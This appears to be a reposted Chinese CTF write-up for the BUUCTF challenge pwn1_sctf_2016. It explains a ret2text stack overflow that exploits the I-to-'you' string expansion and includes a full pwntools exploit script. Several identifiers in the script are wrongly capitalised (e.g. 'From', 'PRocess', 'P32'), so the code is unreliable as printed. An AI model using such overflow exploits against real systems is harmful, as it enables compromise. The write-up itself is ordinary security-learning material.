Buuctf 刷题笔记(PWN)(1)

发布时间:2022-06-28 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了Buuctf 刷题笔记(PWN)(1)脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

Buuctf 刷题笔记(PWN)(1)

pwn1_sctf_2016

1、先使用checksec检查安全选项、再用IDA进行反编译

Buuctf 刷题笔记(PWN)(1)

找到get_flag() 那么这道题可能就是ret2text类型了,直接利用栈溢出到返回地址进行覆盖,进而执行get_flag()就可以了

Buuctf 刷题笔记(PWN)(1)

Buuctf 刷题笔记(PWN)(1)

vuln()函数将我们的输入字符串,对I进行转换,将一个I转换成了you 根据fgets可以知道输入值最长为32长度,而&s地址到返回地址的距离应该是3C+4 所以需要利用I->you的这个特性

fgets(&s, 32, edata);

所以构造的payload应该如下: 'I'*20+'b'*4+get_flag_add

具体Exp如下:


From pwn import *
context.Arch='i386'
context.LOG_level="debug"
p=PRocess("./pwn1_sctf_2016")
#p=remote("node4.buuoj.cn",26033)
payload='I'*20+'b'*4
get_flag=0x8048f0d

payload+=P32(get_flag)
print(payload)
p.sendline(payload)
p.interactive()

脚本宝典总结

以上是脚本宝典为你收集整理的Buuctf 刷题笔记(PWN)(1)全部内容,希望文章能够帮你解决Buuctf 刷题笔记(PWN)(1)所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。